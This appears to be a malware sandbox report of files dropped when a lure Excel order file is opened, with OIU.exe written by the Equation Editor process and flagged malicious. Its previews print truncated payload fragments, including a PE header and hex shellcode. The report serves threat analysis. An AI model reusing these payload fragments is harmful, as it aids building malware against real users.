                                                                    Preview:yc.152P2COOE.TN.9C08CIA.B6L5I49T162P2GOOE5STNI9C08CIABB6L5I.9T18-.<G.F...U....XQ0i10-Q>T$.Z5_X]$.%*o7@=t''...kc$.&'.A8C.9T162P2/_.h.".0eH.N.2.?paI2.8.G_..L{C.1c4.-.?.Gq.V=U0.<.o\7.H.O..+Lj>.;g:7&eH.N8CIABB6L5I49T162..U)OE5S..I9.1<C=.B.6L5I49T1.2s3LNFE5.UNIGA08CIAm.6L5Y49T.72P2.OOU5STLI9F08CIABB3L5I49T16RT2GKOE.hVNK9C.8CYABR6L5I$9T!62P2GO_E5STNI9C08C.T@BfL5I4YV1:.Q2GOOE5STNI9C08CIABB6L5I49..72L2GOOE5STNI9C08CIABB6L5I49T1.?R2.OOE5STNI9C08.HA.C6L5I49T162P2GOOE5STNI9C08Cg5':BL5I,.U16"P2G.NE5WTNI9C08CIABB6L.I4YzCRS$SGO.(5ST.H9C^8CI.CB6L5I49T162P2.OO..75:(9C0.sIABb4L5_49T;42P2GOOE5STNI9.08.g310UL5I8.U16RR2G.NE5sVNI9C08CIABB6LuI4yT162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GO

                                                                    C:\Users\user\AppData\Local\Temp\autCC84.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):9940
                                                                    Entropy (8bit):7.592861217976908
                                                                    Encrypted:false
                                                                    SSDEEP:192:m+cKsSwxOCyTkff82lMdISQUNa53yJLEf8DPxoSGNg6D5lDdRz:97sSwcHkHUOSQl3yJLO8eS+gyZ5
                                                                    MD5:6DBA02FD0343E04E1B01CC0EABB5E980
                                                                    SHA1:9C7EC5BC479120D7BFE17F9485C119AD6939E7F7
                                                                    SHA-256:CD2DD52672ACC9C08FAF4F77A0CC86AD47FB45541C49AD06BC8AE4D82510634E
                                                                    SHA-512:88EA1BD1CB0E59CCBBCA8B58C3FDA8F9084DA2CE31DB794BE47965B3A9B19383893851315FBA7D5F00D99F6155ADF98E5B8751FA2273904C1B6914B5AA8E19A8
                                                                    Malicious:false
                                                                    Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

                                                                    C:\Users\user\AppData\Local\Temp\autCFBE.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):268800
                                                                    Entropy (8bit):7.905027527993877
                                                                    Encrypted:false
                                                                    SSDEEP:6144:0GQG5ytMEwsoj9AKpFNUQ02J2O3O3ik+Bvvn+wH4Boc:0GQG5yssCFNUQbJ2YO3WlP+O8oc
                                                                    MD5:183BA29E3BA1A448C983A6772EA728E8
                                                                    SHA1:43E8E4E6C8925D72F3B24EF74BD7017F6D7503C1
                                                                    SHA-256:2C74D0B73DA91109988EA8AE9AE5BE693FD1F565751DFD28E4D4F5F4BDEA91B5
                                                                    SHA-512:F2BF3E7DCCEF67AE24D9401B10D726C0085616235B38CDEFD9C8BF1C952F7ACEB61E0AEEA711FF7A797921F5BDE8F75BB02CEC26FDC5271840FD8723602B1C0D
                                                                    Malicious:false
                                                                    Preview:yc.152P2COOE.TN.9C08CIA.B6L5I49T162P2GOOE5STNI9C08CIABB6L5I.9T18-.<G.F...U....XQ0i10-Q>T$.Z5_X]$.%*o7@=t''...kc$.&'.A8C.9T162P2/_.h.".0eH.N.2.?paI2.8.G_..L{C.1c4.-.?.Gq.V=U0.<.o\7.H.O..+Lj>.;g:7&eH.N8CIABB6L5I49T162..U)OE5S..I9.1<C=.B.6L5I49T1.2s3LNFE5.UNIGA08CIAm.6L5Y49T.72P2.OOU5STLI9F08CIABB3L5I49T16RT2GKOE.hVNK9C.8CYABR6L5I$9T!62P2GO_E5STNI9C08C.T@BfL5I4YV1:.Q2GOOE5STNI9C08CIABB6L5I49..72L2GOOE5STNI9C08CIABB6L5I49T1.?R2.OOE5STNI9C08.HA.C6L5I49T162P2GOOE5STNI9C08Cg5':BL5I,.U16"P2G.NE5WTNI9C08CIABB6L.I4YzCRS$SGO.(5ST.H9C^8CI.CB6L5I49T162P2.OO..75:(9C0.sIABb4L5_49T;42P2GOOE5STNI9.08.g310UL5I8.U16RR2G.NE5sVNI9C08CIABB6LuI4yT162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GO

                                                                    C:\Users\user\AppData\Local\Temp\autD106.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):9940
                                                                    Entropy (8bit):7.592861217976908
                                                                    Encrypted:false
                                                                    SSDEEP:192:m+cKsSwxOCyTkff82lMdISQUNa53yJLEf8DPxoSGNg6D5lDdRz:97sSwcHkHUOSQl3yJLO8eS+gyZ5
                                                                    MD5:6DBA02FD0343E04E1B01CC0EABB5E980
                                                                    SHA1:9C7EC5BC479120D7BFE17F9485C119AD6939E7F7
                                                                    SHA-256:CD2DD52672ACC9C08FAF4F77A0CC86AD47FB45541C49AD06BC8AE4D82510634E
                                                                    SHA-512:88EA1BD1CB0E59CCBBCA8B58C3FDA8F9084DA2CE31DB794BE47965B3A9B19383893851315FBA7D5F00D99F6155ADF98E5B8751FA2273904C1B6914B5AA8E19A8
                                                                    Malicious:false
                                                                    Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

                                                                    C:\Users\user\AppData\Local\Temp\autD49E.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):268800
                                                                    Entropy (8bit):7.905027527993877
                                                                    Encrypted:false
                                                                    SSDEEP:6144:0GQG5ytMEwsoj9AKpFNUQ02J2O3O3ik+Bvvn+wH4Boc:0GQG5yssCFNUQbJ2YO3WlP+O8oc
                                                                    MD5:183BA29E3BA1A448C983A6772EA728E8
                                                                    SHA1:43E8E4E6C8925D72F3B24EF74BD7017F6D7503C1
                                                                    SHA-256:2C74D0B73DA91109988EA8AE9AE5BE693FD1F565751DFD28E4D4F5F4BDEA91B5
                                                                    SHA-512:F2BF3E7DCCEF67AE24D9401B10D726C0085616235B38CDEFD9C8BF1C952F7ACEB61E0AEEA711FF7A797921F5BDE8F75BB02CEC26FDC5271840FD8723602B1C0D
                                                                    Malicious:false
                                                                    Preview:yc.152P2COOE.TN.9C08CIA.B6L5I49T162P2GOOE5STNI9C08CIABB6L5I.9T18-.<G.F...U....XQ0i10-Q>T$.Z5_X]$.%*o7@=t''...kc$.&'.A8C.9T162P2/_.h.".0eH.N.2.?paI2.8.G_..L{C.1c4.-.?.Gq.V=U0.<.o\7.H.O..+Lj>.;g:7&eH.N8CIABB6L5I49T162..U)OE5S..I9.1<C=.B.6L5I49T1.2s3LNFE5.UNIGA08CIAm.6L5Y49T.72P2.OOU5STLI9F08CIABB3L5I49T16RT2GKOE.hVNK9C.8CYABR6L5I$9T!62P2GO_E5STNI9C08C.T@BfL5I4YV1:.Q2GOOE5STNI9C08CIABB6L5I49..72L2GOOE5STNI9C08CIABB6L5I49T1.?R2.OOE5STNI9C08.HA.C6L5I49T162P2GOOE5STNI9C08Cg5':BL5I,.U16"P2G.NE5WTNI9C08CIABB6L.I4YzCRS$SGO.(5ST.H9C^8CI.CB6L5I49T162P2.OO..75:(9C0.sIABb4L5_49T;42P2GOOE5STNI9.08.g310UL5I8.U16RR2G.NE5sVNI9C08CIABB6LuI4yT162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GO

                                                                    C:\Users\user\AppData\Local\Temp\autD4CE.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):9940
                                                                    Entropy (8bit):7.592861217976908
                                                                    Encrypted:false
                                                                    SSDEEP:192:m+cKsSwxOCyTkff82lMdISQUNa53yJLEf8DPxoSGNg6D5lDdRz:97sSwcHkHUOSQl3yJLO8eS+gyZ5
                                                                    MD5:6DBA02FD0343E04E1B01CC0EABB5E980
                                                                    SHA1:9C7EC5BC479120D7BFE17F9485C119AD6939E7F7
                                                                    SHA-256:CD2DD52672ACC9C08FAF4F77A0CC86AD47FB45541C49AD06BC8AE4D82510634E
                                                                    SHA-512:88EA1BD1CB0E59CCBBCA8B58C3FDA8F9084DA2CE31DB794BE47965B3A9B19383893851315FBA7D5F00D99F6155ADF98E5B8751FA2273904C1B6914B5AA8E19A8
                                                                    Malicious:false
                                                                    Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

                                                                    C:\Users\user\AppData\Local\Temp\autD7D9.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):268800
                                                                    Entropy (8bit):7.905027527993877
                                                                    Encrypted:false
                                                                    SSDEEP:6144:0GQG5ytMEwsoj9AKpFNUQ02J2O3O3ik+Bvvn+wH4Boc:0GQG5yssCFNUQbJ2YO3WlP+O8oc
                                                                    MD5:183BA29E3BA1A448C983A6772EA728E8
                                                                    SHA1:43E8E4E6C8925D72F3B24EF74BD7017F6D7503C1
                                                                    SHA-256:2C74D0B73DA91109988EA8AE9AE5BE693FD1F565751DFD28E4D4F5F4BDEA91B5
                                                                    SHA-512:F2BF3E7DCCEF67AE24D9401B10D726C0085616235B38CDEFD9C8BF1C952F7ACEB61E0AEEA711FF7A797921F5BDE8F75BB02CEC26FDC5271840FD8723602B1C0D
                                                                    Malicious:false
                                                                    Preview:yc.152P2COOE.TN.9C08CIA.B6L5I49T162P2GOOE5STNI9C08CIABB6L5I.9T18-.<G.F...U....XQ0i10-Q>T$.Z5_X]$.%*o7@=t''...kc$.&'.A8C.9T162P2/_.h.".0eH.N.2.?paI2.8.G_..L{C.1c4.-.?.Gq.V=U0.<.o\7.H.O..+Lj>.;g:7&eH.N8CIABB6L5I49T162..U)OE5S..I9.1<C=.B.6L5I49T1.2s3LNFE5.UNIGA08CIAm.6L5Y49T.72P2.OOU5STLI9F08CIABB3L5I49T16RT2GKOE.hVNK9C.8CYABR6L5I$9T!62P2GO_E5STNI9C08C.T@BfL5I4YV1:.Q2GOOE5STNI9C08CIABB6L5I49..72L2GOOE5STNI9C08CIABB6L5I49T1.?R2.OOE5STNI9C08.HA.C6L5I49T162P2GOOE5STNI9C08Cg5':BL5I,.U16"P2G.NE5WTNI9C08CIABB6L.I4YzCRS$SGO.(5ST.H9C^8CI.CB6L5I49T162P2.OO..75:(9C0.sIABb4L5_49T;42P2GOOE5STNI9.08.g310UL5I8.U16RR2G.NE5sVNI9C08CIABB6LuI4yT162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GO

                                                                    C:\Users\user\AppData\Local\Temp\autD818.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):9940
                                                                    Entropy (8bit):7.592861217976908
                                                                    Encrypted:false
                                                                    SSDEEP:192:m+cKsSwxOCyTkff82lMdISQUNa53yJLEf8DPxoSGNg6D5lDdRz:97sSwcHkHUOSQl3yJLO8eS+gyZ5
                                                                    MD5:6DBA02FD0343E04E1B01CC0EABB5E980
                                                                    SHA1:9C7EC5BC479120D7BFE17F9485C119AD6939E7F7
                                                                    SHA-256:CD2DD52672ACC9C08FAF4F77A0CC86AD47FB45541C49AD06BC8AE4D82510634E
                                                                    SHA-512:88EA1BD1CB0E59CCBBCA8B58C3FDA8F9084DA2CE31DB794BE47965B3A9B19383893851315FBA7D5F00D99F6155ADF98E5B8751FA2273904C1B6914B5AA8E19A8
                                                                    Malicious:false
                                                                    Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

                                                                    C:\Users\user\AppData\Local\Temp\autDB04.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):268800
                                                                    Entropy (8bit):7.905027527993877
                                                                    Encrypted:false
                                                                    SSDEEP:6144:0GQG5ytMEwsoj9AKpFNUQ02J2O3O3ik+Bvvn+wH4Boc:0GQG5yssCFNUQbJ2YO3WlP+O8oc
                                                                    MD5:183BA29E3BA1A448C983A6772EA728E8
                                                                    SHA1:43E8E4E6C8925D72F3B24EF74BD7017F6D7503C1
                                                                    SHA-256:2C74D0B73DA91109988EA8AE9AE5BE693FD1F565751DFD28E4D4F5F4BDEA91B5
                                                                    SHA-512:F2BF3E7DCCEF67AE24D9401B10D726C0085616235B38CDEFD9C8BF1C952F7ACEB61E0AEEA711FF7A797921F5BDE8F75BB02CEC26FDC5271840FD8723602B1C0D
                                                                    Malicious:false
                                                                    Preview:yc.152P2COOE.TN.9C08CIA.B6L5I49T162P2GOOE5STNI9C08CIABB6L5I.9T18-.<G.F...U....XQ0i10-Q>T$.Z5_X]$.%*o7@=t''...kc$.&'.A8C.9T162P2/_.h.".0eH.N.2.?paI2.8.G_..L{C.1c4.-.?.Gq.V=U0.<.o\7.H.O..+Lj>.;g:7&eH.N8CIABB6L5I49T162..U)OE5S..I9.1<C=.B.6L5I49T1.2s3LNFE5.UNIGA08CIAm.6L5Y49T.72P2.OOU5STLI9F08CIABB3L5I49T16RT2GKOE.hVNK9C.8CYABR6L5I$9T!62P2GO_E5STNI9C08C.T@BfL5I4YV1:.Q2GOOE5STNI9C08CIABB6L5I49..72L2GOOE5STNI9C08CIABB6L5I49T1.?R2.OOE5STNI9C08.HA.C6L5I49T162P2GOOE5STNI9C08Cg5':BL5I,.U16"P2G.NE5WTNI9C08CIABB6L.I4YzCRS$SGO.(5ST.H9C^8CI.CB6L5I49T162P2.OO..75:(9C0.sIABb4L5_49T;42P2GOOE5STNI9.08.g310UL5I8.U16RR2G.NE5sVNI9C08CIABB6LuI4yT162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GO

                                                                    C:\Users\user\AppData\Local\Temp\autDB34.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):9940
                                                                    Entropy (8bit):7.592861217976908
                                                                    Encrypted:false
                                                                    SSDEEP:192:m+cKsSwxOCyTkff82lMdISQUNa53yJLEf8DPxoSGNg6D5lDdRz:97sSwcHkHUOSQl3yJLO8eS+gyZ5
                                                                    MD5:6DBA02FD0343E04E1B01CC0EABB5E980
                                                                    SHA1:9C7EC5BC479120D7BFE17F9485C119AD6939E7F7
                                                                    SHA-256:CD2DD52672ACC9C08FAF4F77A0CC86AD47FB45541C49AD06BC8AE4D82510634E
                                                                    SHA-512:88EA1BD1CB0E59CCBBCA8B58C3FDA8F9084DA2CE31DB794BE47965B3A9B19383893851315FBA7D5F00D99F6155ADF98E5B8751FA2273904C1B6914B5AA8E19A8
                                                                    Malicious:false
                                                                    Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

                                                                    C:\Users\user\AppData\Local\Temp\reenlarge

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:ASCII text, with very long lines (29744), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):29744
                                                                    Entropy (8bit):3.5466799935057463
                                                                    Encrypted:false
                                                                    SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbiE+I76Md4vfF3if6gyb:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RW
                                                                    MD5:022B24B208B162C3C5E12C60AE82BCC0
                                                                    SHA1:92FEB09862427996BA4C0D9A210956B58BCAEB0F
                                                                    SHA-256:77D16500EF4C0335FA369BD45964FCD6317CD6771871DFE5748E7D266C9982CD
                                                                    SHA-512:42E46A68A292BADD9739A673F4441A6C584E567A5E1ADEFBA43C0567375E09A3F82A84C244EB4C5F3AAE35D9E4EC7513496D56107A64E181CD02E54ABAE90E4C
                                                                    Malicious:false
                                                                    Preview:048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

                                                                    C:\Users\user\AppData\Local\Temp\~$imgs.xlsx

                                                                    Download File
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):165
                                                                    Entropy (8bit):1.4377382811115937
                                                                    Encrypted:false
                                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                    Malicious:false
                                                                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                    C:\Users\user\AppData\Roaming\OIU.exe

                                                                    Download File
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1287680
                                                                    Entropy (8bit):7.045054906252616
                                                                    Encrypted:false
                                                                    SSDEEP:24576:rqDEvCTbMWu7rQYlBQcBiT6rprG8aHd/W1zVtAdczPe8:rTvC/MTQYxsWR7aHd/WFVpz
                                                                    MD5:158C5C0367C262694F3C44AE85B891B6
                                                                    SHA1:C8AE2619967B6FBF4962A57A34C614B7C6517B45
                                                                    SHA-256:82215185860A139B407AD688A9A83A05EF78A9AF58EE96F575E8DBA25B965340
                                                                    SHA-512:EF67D25306F175AB98E33F2730B2423FE20C433B1329D8C6C5812B428CB040DBB4965D8C59D5AA3A99A0E1AFEF54E0C918075768F6B3D2CF68119D1AA872D3EA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 27%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....1f..........".................w.............@..................................*....@...@.......@.....................d...|....@...:.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....:...@...<..................@..@.reloc...u.......v...0..............@..B........................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\~$Order Request1_5_24.xlam.xls

                                                                    Download File
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):165
                                                                    Entropy (8bit):1.4377382811115937
                                                                    Encrypted:false
                                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                    Malicious:false
                                                                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                    C:\Users\user\Desktop\~$Order Request1_5_24.xlam.xlsx

                                                                    Download File
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):165
                                                                    Entropy (8bit):1.4377382811115937
                                                                    Encrypted:false
                                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                    Malicious:false
                                                                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                    Chrome Cache Entry: 87

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
